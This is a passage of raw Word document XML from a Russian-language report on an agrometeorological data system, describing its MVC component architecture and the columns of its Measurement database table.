    <w:p w14:paraId="0A0EC3B5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:r>
        <w:t>Администраторские функции приложения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7376AEDF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>доступ к изменению исходного кода программы и разворачиванию скомпилированной программы на компьютере;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1FA317" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>доступ к системным файлам веб-сервера: файлам журнала, базы данных и т.д.;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C0696B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241">
      <w:r>
        <w:t xml:space="preserve">В соответствии с функциональными требованиями и особенностями программирования паттерна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> программная</w:t>
      </w:r>
      <w:r w:rsidRPr="00112241">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>архитектура проекта выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B991353" w14:textId="37F632D7" w:rsidR="0093378B" w:rsidRDefault="001F04F3" w:rsidP="00112241">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B065E3A" wp14:editId="645F6793">
            <wp:extent cx="5038848" cy="3752850"/>
            <wp:effectExtent l="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044063" cy="3756734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A872EE5" w14:textId="7D97E55C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D37C5">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">диаграмма </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t>компонентов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> информационной системы по сбору, хранению и обработке агрометеорологических данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1ED592" w14:textId="3BE6B41E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00646613">
      <w:r>
        <w:t xml:space="preserve">На диаграмме </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">компонентов можно увидеть 6 отдельных логических компонентов, взаимодействующих друг с другом через интерфейсы: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DataBase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">база данных, которая является источником данных для моделей </w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controllers</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">в нём находятся функции-контроллеры, каждый отвечает за реализацию своей модели данных, </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Views</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">– представления, которые отображают данные, взаимодействуя с </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">кодом из компонента </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wwwroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="009F0403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">вспомогательный компонент, в котором хранятся вспомогательные классы и функции, например, хэширование паролей, некоторые функции для работы дисперсионного анализа. Более подробное описание каждого компонента модели будет рассмотрено ниже, также в настоящем отчёте присутствует </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F0403">
        <w:t xml:space="preserve">-диаграмма классов, представленная в </w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="00BF681E">
        <w:t>параграфе (</w:t>
      </w:r>
      <w:r w:rsidR="00BF681E" w:rsidRPr="00BF681E">
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="00BF681E">
        <w:t>) на рисунке (</w:t>
      </w:r>
      <w:r w:rsidR="00BF681E" w:rsidRPr="00BF681E">
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="00BF681E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="009F0403">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Сперва следует рассмотреть структуру базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3F55D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00646613" w:rsidRDefault="0093378B" w:rsidP="00646613">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00646613">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сервер содержит несколько таблиц:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618DAE2" w14:textId="2A29E89F" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00646613">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0B28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">содержит данные, собранные метеостанцией, описание данных приведено в таблице </w:t>
      </w:r>
      <w:r w:rsidR="00823137">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291F1BB" w14:textId="0A06A122" w:rsidR="0093378B" w:rsidRPr="00646613" w:rsidRDefault="0093378B" w:rsidP="00646613">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00823137">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства таблицы «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>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8"/>
        <w:gridCol w:w="1748"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="3B18959C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63F386C5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Название колонки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10862CE1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тип данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06746A24" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="78E21845" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="393053CB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E0B6F96"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67C482FD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>уникальный идентификатор записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="00568914" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14CA12A5"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date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2739F5EC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="759C1820" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>дата измерения (ГГГГ-ММ-ДД)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4FEE9E07" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12D564B6"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hour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F85668C"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5BBBD531" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>час измерения (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>чч</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="5519E2AD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10315B98"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min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5093A305"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4AE1D7A0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>минута измерения (мм)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4CFBCED6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D19E09C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44CAB1BD"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2F117D2C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>температура поверхности почвы (градусы цельсия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="36591ECB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="733AB703" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>far</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E8BF509" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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4A44395A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>датчик освещённости (люкс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="07C30E62" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13FF1735" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
